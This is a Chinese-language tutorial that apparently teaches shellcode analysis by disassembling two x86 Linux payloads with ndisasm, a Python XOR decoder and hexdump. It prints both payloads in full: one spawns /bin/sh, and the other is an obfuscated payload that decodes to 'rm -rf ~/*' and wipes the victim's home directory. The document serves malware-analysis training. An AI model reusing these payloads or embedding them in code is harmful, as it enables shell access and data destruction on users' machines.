下面,我们将分析几个已有的shellcode的功能,通过分析,了解shellcode分析的技巧。
第一个shellcode代码如下:
static char shellcode[]=
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"
"\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e"
"\x2f\x73\x68\x58";
使用ndisasm反汇编结果如下:
root@linux:~/pentest# echo -ne "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58" | ndisasm -u -
00000000 EB17 jmp short 0x19
00000002 5E pop esi
00000003 897608 mov [esi+0x8],esi
00000006 31C0 xor eax,eax
00000008 884607 mov [esi+0x7],al
0000000B 89460C mov [esi+0xc],eax
0000000E B00B mov al,0xb
00000010 89F3 mov ebx,esi
00000012 8D4E08 lea ecx,[esi+0x8]
00000015 31D2 xor edx,edx
00000017 CD80 int 0x80
00000019 E8E4FFFFFF call dword 0x2
0000001E 2F das
0000001F 62696E bound ebp,[ecx+0x6e]
00000022 2F das
00000023 7368 jnc 0x8d
00000025 58 pop eax
root@linux:~/pentest#
可以看出,这是一个执行“/bin/sh”的shellcode。
第二个shellcode代码如下:
char shellcode2[] =
"\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9"
"\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99"
"\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81"
"\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb"
"\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf"
"\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7"
"\x7b\x35";
下面使用ndisasm反汇编,结果如下:
root@linux:~/pentest# echo -ne
"\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7\x7b\x35" | ndisasm -u -
00000000 EB10 jmp short 0x12
00000002 5E pop esi
00000003 31C9 xor ecx,ecx
00000005 B14B mov cl,0x4b
00000007 B0FF mov al,0xff
00000009 3006 xor [esi],al
0000000B FEC8 dec al
0000000D 46 inc esi
0000000E E2F9 loop 0x9
00000010 EB05 jmp short 0x17
00000012 E8EBFFFFFF call dword 0x2
00000017 17 pop ss
00000018 DB db 0xdb
00000019 FD std
0000001A FC cld
0000001B FB sti
0000001C D59B aad 0x9b
0000001E 91 xchg eax,ecx
0000001F 99 cdq
00000020 D9869CF38199 fld dword [esi-0x667e0c64]
00000026 F0C28DED lock ret 0xed8d
0000002A 9E sahf
0000002B 86CA xchg cl,dl
0000002D C49A81C69BCB les ebx,[edx-0x3464397f]
00000033 C9 leave
00000034 C2D3DE ret 0xded3
00000037 F0BAB8AAF4B4 lock mov edx,0xb4f4aab8
0000003D AC lodsb
0000003E B4BB mov ah,0xbb
00000040 D6 salc
00000041 88E5 mov ch,ah
00000043 13825C8DC19D adc eax,[edx-0x623e72a4]
00000049 40 inc eax
0000004A 91 xchg eax,ecx
0000004B C0994495CF954C rcr byte [ecx-0x6a306abc],0x4c
00000052 2F das
00000053 4A dec edx
00000054 23F0 and esi,eax
00000056 120F adc cl,[edi]
00000058 B570 mov ch,0x70
0000005A 3C32 cmp al,0x32
0000005C 7988 jns 0xffffffe6
0000005E 78F7 js 0x57
00000060 7B35 jpo 0x97
root@linux:~/pentest#
接下来,我们将使用一个python脚本和hexdump来分析这个shellcode。
root@linux:~/pentest# cat decode.py
#!/usr/bin/env python
sc = "\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9" + \
"\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99" + \
"\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81" + \
"\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb" + \
"\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf" + \
"\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7" + \
"\x7b\x35"
print "".join([chr((ord(x)^(0xff-i))) for i,x in enumerate(sc[0x17:])])
root@linux:~/pentest# ./decode.py | hexdump -C
00000000 e8 25 00 00 00 2f 62 69 6e 2f 73 68 00 73 68 00 |.%.../bin/sh.sh.|
00000010 2d 63 00 72 6d 20 2d 72 66 20 7e 2f 2a 20 32 3e |-c.rm -rf ~/* 2>|
00000020 2f 64 65 76 2f 6e 75 6c 6c 00 5d 31 c0 50 8d 5d |/dev/null.]1.P.]|
00000030 0e 53 8d 5d 0b 53 8d 5d 08 53 89 eb 89 e1 31 d2 |.S.].S.].S....1.|
00000040 b0 0b cd 80 89 c3 31 c0 40 cd 80 0a |......1.@...|
0000004c
root@linux:~/pentest#
可以看到“/bin/sh”“sh”“rm –rf ~/* 2>/dev/null”几条指令,接下来我们使用ndisasm分析:
root@linux:~/pentest# ./decode.py | ndisasm -u -
00000000 E825000000 call dword 0x2a
00000005 2F das
00000006 62696E bound ebp,[ecx+0x6e]
00000009 2F das
0000000A 7368 jnc 0x74
0000000C 007368 add [ebx+0x68],dh
0000000F 002D6300726D add [dword 0x6d720063],ch
00000015 202D7266207E and [dword 0x7e206672],ch
0000001B 2F das
0000001C 2A20 sub ah,[eax]
0000001E 323E xor bh,[esi]
00000020 2F das
00000021 6465762F gs jna 0x54
00000025 6E outsb
00000026 756C jnz 0x94
00000028 6C insb
00000029 005D31 add [ebp+0x31],bl
0000002C C0508D5D rcl byte [eax-0x73],0x5d
00000030 0E push cs
00000031 53 push ebx
00000032 8D5D0B lea ebx,[ebp+0xb]
00000035 53 push ebx
00000036 8D5D08 lea ebx,[ebp+0x8]
00000039 53 push ebx
0000003A 89EB mov ebx,ebp
0000003C 89E1 mov ecx,esp
0000003E 31D2 xor edx,edx
00000040 B00B mov al,0xb
00000042 CD80 int 0x80
00000044 89C3 mov ebx,eax
00000046 31C0 xor eax,eax
00000048 40 inc eax
00000049 CD80 int 0x80
0000004B 0A db 0x0a
root@linux:~/pentest#